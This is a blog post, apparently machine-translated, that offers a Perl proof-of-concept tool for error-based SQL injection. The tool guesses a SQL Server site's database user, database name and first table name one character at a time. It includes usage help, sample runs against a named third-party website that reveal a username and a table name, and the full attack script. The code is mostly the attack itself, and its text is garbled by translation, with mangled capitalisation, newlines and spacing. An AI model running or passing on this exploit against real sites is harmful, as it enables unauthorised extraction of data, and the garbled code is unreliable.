Cawan's Perl Program Implementation of SQL injection as a way of thinking for database penetration

Yesterday I read cawan's article "SQL injection is a way of thinking about database penetration", and it feels really good. So I implemented the method proposed in this article using Perl. This program is only a POC version, so I only implement the function of guessing user, db_name, and the first table name. Other functions have not yet been implemented. In addition, I have not optimized the algorithm used to guess part of the program. I have used an algorithm that is the easiest to program but with relatively low speed and efficiency.

If you think it is necessary, you can consider extending the program to include the function of guessing all table names and table fields. Of course, if you want to release it, do not use Perl ~~~~

The program running help is as follows:

H:/temp> sin. pl
**************************************** ****************************************

SQL Injection New Method POC

Method By cawan [est]

Coded by superlone [est]

Usage:
Sin. pl URL

-U try to get user () Return Value
-D try to get db_name () Return Value
-T try to get first table name value
Example:
Sin. pl http://www.xxx.com/userinfo.asp? Id = 1-T

**************************************** ****************************************

The process of guessing the user is as follows:

H:/temp> sin. pl Co., http://www.aquavelvas.com/blog.asp? Id = 4-u

[+] Testing if there is vul in your url page...

[+] SQL injection vulnerability found!

[+] Guessing user () Return Value length... Wait!

**************************************** ****************************************

[+] User () Return Value length is [7]

**************************************** ****************************************

[+] Guessing user () return value... Wait!

**************************************** ****************************************

[+] The 1th letter is: T
[+] The 2th letter is: H
[+] The 3th letter is: O
[+] The 4th letter is: m
[+] The 5th letter is:
[+] The 6th letter is: S
[+] The 7th letter is:
[+] User () return value is [thomasa]

**************************************** ****************************************

The process of guessing the first table name is as follows:

H:/temp> sin. pl Co., http://www.aquavelvas.com/blog.asp? Id = 4-T

[+] Testing if there is vul in your url page...

[+] SQL injection vulnerability found!

[+] Guessing first table name length... Wait!

**************************************** ****************************************

[+] First table name length is [17]

[+] Guessing first table name value... Wait!

[+] The 1th letter is: G
[+] The 2th letter is: E
[+] The 3th letter is: O
[+] The 4th letter is: I
[+] The 5th letter is: P
[+] The 6th letter is: c
[+] The 7th letter is: O
[+] The 8th letter is: u
[+] The 9th letter is: N
[+] The 10th letter is: T
[+] The 11th letter is: R
[+] The 12th letter is: Y
[+] The 13th letter is: W
[+] The 14th letter is: H
[+] The 15th letter is: O
[+] The 16th letter is: I
[+] The 17th letter is: S
[+] First table name value is [geoipcountrywhois]

**************************************** ****************************************

It's very easy to implement, so don't laugh at me anymore... The Code is as follows:
#! /Usr/bin/perl
# Method by cawan {est]
# Coded by superlone [est]
# Use strict;
Use lwp: useragent;
Local @ alpha_code = ('A'... 'Z ');
Local @ number_code = (0... 9 );

If (@ argv = 0 ){
& Help ;}

My $ url = shift;
My $ UA = new lwp: useragent;

If ($ argv [0] EQ "-U "){
& Testpage ($ URL );
Print "[+] guessing user () Return Value length... Wait! /N ";
Print "*" x 80, "/N ";
My $ ilen = & guesslength ($ URL, "user ");
Print "[+] user () Return Value length is [". $ ilen. "]/n ";
Print "*" x 80, "/N ";
Print "[+] guessing user () return value... Wait! /N ";
Print "*" x 80, "/N ";
Print "[+] user () return value is". & crackcode ($ URL, $ ilen, "user"). "/n ";
Print "*" x 80, "/N";} elsif ($ argv [0] EQ "-d "){
& Testpage ($ URL );
Print "[+] guessing db_name () Return Value length... Wait! /N ";
Print "*" x 80, "/N ";
$ Ilen = & guesslength ($ URL, "db_name ");
Print "[+] user () Return Value length is [". $ ilen. "]/n ";
Print "[+] guessing db_name () return value... Wait! /N ";
Print "*" x 80, "/N ";
Print "[+] db_name () return value is". & crackcode ($ URL, $ ilen, "db_name"). "/n ";
Print "*" x 80, "/N";} elsif ($ argv [0] EQ "-T "){
& Testpage ($ URL );
Print "[+] guessing first table name length... Wait! /N ";
Print "*" x 80, "/N ";
$ Ilen = & guesslength ($ URL, "table ");
Print "[+] First table name length is [". $ ilen. "]/n ";
Print "[+] guessing first table name value... Wait! /N ";
Print "[+] First table name value is". & crackcode ($ URL, $ ilen, "table"). "/n ";
Print "*" x 80, "/N";} else {& help ;}

Sub guesslength {
My $ url = shift;
My $ func = shift;

$ Func = "(select top 1 name from sysobjects where xtype = 'U')" If ($ func EQ "table ");
My $ I = 0;
While ($ I <32)
{
My $ temp = $ URL. "'% 20and % 20len (". $ func. ")>'". $ I ++;
# Print "[-] structured URL:". "$ Temp". "/N ";
My $ Req = new http: Request ('get' => $ temp );
My $ res = $ UA-> request ($ req );
If ($ res-> content = ~ /Syntax error/| $ res-> content = ~ /Either BOF or EOF is true /){
Last;
}
}
Return $ I-1;
}

Sub testpage {
My $ url = shift;
$ URL. = "and 1 = 1 ";
My $ UA = new lwp: useragent;
My $ Req = new http: Request ('get' => $ URL );
# Print "url is". $ URL. "/N ";
Print "/n [+] testing if there is vul in your url page.../n ";
My $ res = $ UA-> request ($ req );
# Print "Return content:". $ res-> content. "/N ";
If ($ res-> content = ~ /Syntax error /){
Print "[+] SQL injection vulnerability found! /N ";} else {
Print "[+] Page has no vul or server error echo disabled! /N ";
Exit;
}
}
Sub help {
Print "*" x 80, "/N ";
Print "/T/tsql injection New Method poc/n ";
Print "/T method by cawan [est]/n ";
Print "/T coded by superlone [est]/n ";
Print "/tusage:/n/T/Tsin. pl URL

/N ";
Print "/T-u try to get user () return value/N ";
Print "/T-d try to get db_name () return value/N ";
Print "/T-t try to get first table name value/N ";
Print "/texample:/n/T/Tsin. pl [url] http://www.xxx.com/userinfo.asp? Id = 1 [/url]-T/n ";
Print "*" x 80, "/N ";
Exit;
}
Sub crackcode {
My $ url = shift;
My $ userlen = shift;
My $ func = shift;
My $ I = 0;
My $ J = 0;
My $ k = 1;
My $ bfound = 0;
My $ name;

$ Func = "(select top 1 name from sysobjects where xtype = 'U')" If ($ func EQ "table ");

While ($ k <= $ userlen ){
$ I = 0; $ J = 0; $ bfound = 0;
While ($ I <@ alpha_code ){
My $ temp = $ URL. "'% 20and % 20 substring (". $ func. ",". $ K. ", 1) = '". $ alpha_code [$ I ++];
# Print $ temp, "/N ";
My $ Req = new http: Request ('get' => $ temp );
My $ res = $ UA-> request ($ req );
If ($ res-> content = ~ /Incorrect syntax /){
$ Name. = $ alpha_code [$ I-1];
Print "[+] The". $ K. "th letter is:", $ alpha_code [$ I-1], "/N ";
$ Bfound = 1;
Last ;}
}
While ($ j <@ number_code & $ bfound = 0 ){
My $ temp = $ URL. "'% 20and % 20 substring (". $ func. ",". $ K. ", 1) = '". $ number_code [$ J ++];
# Print $ temp, "/N ";
My $ Req = new http: Request ('get' => $ temp );
My $ res = $ UA-> request ($ req );
If ($ res-> content = ~ /Incorrect syntax /){
$ Name. = $ number_code [$ J-1];
Print "[+] The". $ K. "th letter is:", $ alpha_code [$ I-1], "/N ";
$ Bfound = 0;
Last;
}
}
$ K ++;
}
Return '['. $ name. ']';
}